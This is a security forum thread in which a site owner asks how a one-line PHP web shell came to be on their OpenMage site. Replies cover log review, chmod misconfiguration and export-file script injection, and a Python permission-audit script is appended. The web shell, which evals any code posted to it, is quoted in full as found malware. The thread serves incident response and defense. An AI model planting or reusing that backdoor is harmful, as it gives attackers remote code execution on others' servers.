
On my website I found a file containing this code

<?php if(isset($_POST[z]))eval($_POST[z]);?>

It's my understanding that the hacker is using this to execute any PHP command sent via a POST request.

I'm trying to see how this file got uploaded but I see no record on the access logs with the filename.

So this was possibly done via exploiting a file upload vulnerability.

What would be the first steps to follow up the trail they might have left to detect the root of the vulnerability?

Answering the comments below

  • The platform is OpenMage latest version.
  • The site is hosted on a VPS using cPanel and Cloudflare.
  • The site is recently updated.
  • The service is a managed VPS so it's handled by the hosting company and kept up to date automatically.
gabtzi
  • It is hard to say with the limited information you have shared here. Are you using a dedicated server or is it shared hosting? Do you use a specific CMS, if yes which one and is it recently updated? If any, how is your server patch management handled? As you suspect the upload functionality, I'd have someone do a secure code review on this part of the code but there are many other dependencies. – Jeroen Oct 13 '21 at 06:27
  • 3
    It's impossible to say. That's like asking a doctor to tell you how you got sick. If you need to know, hire a professional and let them assess the security of your system. –  Oct 13 '21 at 12:16
  • @MechMK1 I didn't ask for telling me the exact reason. I'd like to learn more on how to troubleshoot issues like that and would like guidance on which steps to take that could lead me to a possible result. E.g. by googling around I found suggestions like checking the access logs for common attack vectors like "union/select/encoded characters" etc etc. That's the type of info I need, not an exact solution to the issue – gabtzi Oct 13 '21 at 12:33
  • 4
    It's a bit of an open-ended question. What you're asking is basically "how do I perform incident response and post-breach forensics, and find the vulnerability that was exploited?", but that's at least two fields of study that justify entire careers, rather than something that can be neatly summed up in a StackExchange answer. I sympathise with your situation, though. I'd suggest contacting the VPS provider to get access logs to CPanel, and checking the web server request logs from around the creation time of the malicious PHP script file. – Polynomial Oct 13 '21 at 13:04

1 Answer


Check your chmod settings

The most common source of malicious file uploads on an up to date cPanel site is a bad chmod setting. Chmod is a pretty simple yet effective way for Unix based webhosting platforms to control access to the file structure by controlling who has read, write, and execute privileges.

In general, all of your files should be set to 644 and your folders to 755 on a normally configured website. The exception to this rule is an uploads folder which should be 666 or 766.

A very common mistake for new developers/admins who do not know how chmod works is to troubleshoot a problem by opening chmod all the way up to 777 (usually when trying to get an uploads folder to work), seeing that the problem is fixed, and then leaving it that way. By setting that last number to 7 (or 3) you give everyone on the internet permission to both upload and execute scripts in your uploads folder. This is a bad combination because it means anyone can upload a script AND tell it to run. When you upload a script to a properly configured uploads folder, the folder does not allow the script to be run so it just sits there harmlessly.

...or it could be a script injection exploit

Another, less common but possible vulnerability would be at the application level. If your application works by taking input from an end user, and then writing that to a file, then it is possible that the file is being written into a default 755 folder with default 644 file privileges. There are too many variations of this to go over in detail, but the general way this attack works is to inject a script through a normal user interface, then tell the system to create some manner of export file, then change the extension to something executable like myexport.php. Then when you go to "download" your export file, it instead executes the file containing a php script, and the php script then writes the virus to your website procedurally.

A lot of developers don't think to adjust their chmod settings in situations where they are generating downloadable files via PHP because nothing actually needs to be uploaded; so, it works just fine with default settings.

If it was uploaded via script injection like this, it will not show up as anything unusual in your access logs because no files were actually uploaded. All the "uploading" would have been done through normal looking web traffic. That said, you may find some telltale code somewhere in your database if the hacker did not clean up after himself.

Nosajimiki
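A permission audit for the two conditions the answer describes (a world-writable folder, and PHP files sitting in a folder meant for uploads), as an added example that is not part of the answer. The sample web root it builds, including the 777 uploads folder and a stand-in `.php` file, is constructed; `upload_dirs` is a hypothetical parameter naming the folders your application writes user content to.

```python
import os
import stat
import tempfile

def audit_webroot(root, upload_dirs=()):
    """Walk a web root and report:
    - every directory or file that is world-writable (the 'o+w' bit, as in 777/666), and
    - every .php file inside a directory meant for uploads, where the web server should
      serve data rather than execute code.
    Paths are returned relative to root and sorted so the result is easy to diff."""
    world_writable, php_in_uploads = [], []
    uploads = [os.path.normpath(os.path.join(root, d)) for d in upload_dirs]
    for dirpath, _dirnames, filenames in os.walk(root):
        here = os.path.normpath(dirpath)
        in_uploads = any(here == u or here.startswith(u + os.sep) for u in uploads)
        for name in [None] + filenames:               # None -> the directory itself
            p = dirpath if name is None else os.path.join(dirpath, name)
            if os.lstat(p).st_mode & stat.S_IWOTH:
                world_writable.append(os.path.relpath(p, root))
            if name and in_uploads and name.lower().endswith(".php"):
                php_in_uploads.append(os.path.relpath(p, root))
    return {"world_writable": sorted(world_writable), "php_in_uploads": sorted(php_in_uploads)}

def build_sample_tree():
    """Create a constructed web root (not from the post) reproducing the mistake the
    answer describes: an uploads folder left at 777 with a PHP file dropped into it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.php": "<?php echo 'site'; ?>",
        "media/upload/photo.jpg": "not really a jpeg",
        "media/upload/cache.php": "<?php /* stand-in for a dropped script */ ?>",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o644)                        # files: 644, as the answer recommends
    os.chmod(os.path.join(root, "media"), 0o755)     # folders: 755
    os.chmod(os.path.join(root, "media", "upload"), 0o777)   # the mistake being audited
    return root

if __name__ == "__main__":
    sample = build_sample_tree()
    for key, paths in audit_webroot(sample, upload_dirs=["media/upload"]).items():
        print(key, paths or "(none)")
```

Run it against the real document root with the application's actual upload folders; any hit under `php_in_uploads` is worth preserving (with its mtime and ctime) before cleanup, since those timestamps drive the log search.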